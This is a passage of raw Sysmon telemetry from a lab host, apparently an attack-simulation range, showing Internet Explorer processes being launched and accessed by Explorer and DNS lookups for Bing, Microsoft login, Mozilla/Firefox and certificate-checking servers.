Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.975{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+112898(wow64) 10341000x800000000000000013673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.287{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.272{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.272{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:21.150{59A5CD1D-8E56-6005-2E00-00000000A301}2464137.31.126.40.in-addr.arpa.9003-C:\Windows\sysmon64.exe 
22542200x800000000000000013669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:21.060{59A5CD1D-9410-6005-0E05-00000000A301}6584www2.bing.com0type: 5 www2-bing-com.dual-a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:20.023{59A5CD1D-9410-6005-0E05-00000000A301}6584login.live.com0type: 5 login.msa.msidentity.com;type: 5 www.tm.lg.prod.aadmsa.akadns.net;type: 5 prda.aadg.msidentity.com;type: 5 www.tm.a.prd.aadg.akadns.net;::ffff:40.126.31.137;::ffff:40.126.31.141;::ffff:20.190.159.134;::ffff:20.190.159.136;::ffff:40.126.31.1;::ffff:40.126.31.6;::ffff:40.126.31.8;::ffff:40.126.31.135;C:\Program Files (x86)\Internet Explorer\iexplore.exe 10341000x800000000000000013697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.053{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.028{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files 
(x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.028{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.028{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet 
Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+4d2dd7(wow64) 10341000x800000000000000013704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.756{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.740{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.740{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.740{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1bab18(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baacf(wow64)|C:\Windows\SYSTEM32\iertutil.dll+1baa76(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+3a87af(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b739e(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+1b72eb(wow64)|C:\Program Files (x86)\Internet Explorer\IEShims.dll+3fc44(wow64)|C:\Windows\SYSTEM32\urlmon.dll+10c870(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5b40a(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bbb0(wow64)|C:\Windows\SYSTEM32\urlmon.dll+5bccc(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+40bd89(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+594080(wow64)|C:\Windows\SYSTEM32\MSHTML.dll+593ffd(wow64) 10341000x800000000000000013700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.709{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet 
Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.693{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.693{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.504{59A5CD1D-9410-6005-0E05-00000000A301}6584ocsp.rootg2.amazontrust.com0::ffff:143.204.101.124;::ffff:143.204.101.190;::ffff:143.204.101.42;::ffff:143.204.101.74;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.479{59A5CD1D-9410-6005-0E05-00000000A301}6584o.ss2.us0::ffff:99.84.85.140;::ffff:99.84.85.20;::ffff:99.84.85.83;::ffff:99.84.85.98;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.462{59A5CD1D-9410-6005-0E05-00000000A301}6584www.firefox.com0type: 5 fxc-prod.moz.works;type: 5 dzlgdtxcws9pb.cloudfront.net;::ffff:143.204.90.114;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.281{59A5CD1D-9410-6005-0E05-00000000A301}6584r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;::ffff:23.55.163.58;::ffff:23.55.163.48;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:24.268{59A5CD1D-9410-6005-0E05-00000000A301}6584crl.identrust.com0type: 5 identrust.edgesuite.net;type: 5 a1952.dscq.akamai.net;::ffff:23.55.163.57;::ffff:23.55.163.73;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.964{59A5CD1D-9410-6005-0E05-00000000A301}6584firefox.com0::ffff:44.236.48.31;::ffff:44.236.72.93;::ffff:44.235.246.155;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.953{59A5CD1D-940F-6005-0C05-00000000A301}6476cdn-3.convertexperiments.com0type: 5 cdn-3.convertexperiments.com.edgekey.net;type: 5 e5289.g.akamaiedge.net;::ffff:104.125.20.245;C:\Program Files\Internet Explorer\iexplore.exe 22542200x800000000000000013705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:23.904{59A5CD1D-9410-6005-0E05-00000000A301}6584www.mozilla.org0type: 5 www.mozilla.org.cdn.cloudflare.net;::ffff:104.18.165.34;::ffff:104.18.164.34;C:\Program Files (x86)\Internet Explorer\iexplore.exe 22542200x800000000000000013715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.204{59A5CD1D-8E56-6005-2E00-00000000A301}246434.165.18.104.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000013714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:25.202{59A5CD1D-8E56-6005-2E00-00000000A301}246431.48.236.44.in-addr.arpa.0type: 12 ec2-44-236-48-31.us-west-2.compute.amazonaws.com;C:\Windows\sysmon64.exe 22542200x800000000000000013713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:24.526{59A5CD1D-9410-6005-0E05-00000000A301}6584ocsp.rootca1.amazontrust.com0::ffff:13.35.253.148;::ffff:13.35.253.185;::ffff:13.35.253.198;::ffff:13.35.253.5;C:\Program Files (x86)\Internet Explorer\iexplore.exe 
22542200x800000000000000013721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:26.235{59A5CD1D-8E56-6005-2E00-00000000A301}2464140.85.84.99.in-addr.arpa.0type: 12 server-99-84-85-140.muc50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000013720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:26.231{59A5CD1D-8E56-6005-2E00-00000000A301}2464148.253.35.13.in-addr.arpa.0type: 12 server-13-35-253-148.fra6.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000013719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:26.230{59A5CD1D-8E56-6005-2E00-00000000A301}2464124.101.204.143.in-addr.arpa.0type: 12 server-143-204-101-124.fra50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000013718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:26.230{59A5CD1D-8E56-6005-2E00-00000000A301}2464114.90.204.143.in-addr.arpa.0type: 12 server-143-204-90-114.fra50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000013717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:26.229{59A5CD1D-8E56-6005-2E00-00000000A301}246458.163.55.23.in-addr.arpa.0type: 12 a23-55-163-58.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000013716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:26.229{59A5CD1D-8E56-6005-2E00-00000000A301}246457.163.55.23.in-addr.arpa.0type: 12 a23-55-163-57.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 10341000x800000000000000013756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64) 10341000x800000000000000013755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:29.896{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c61ff(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5faa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEF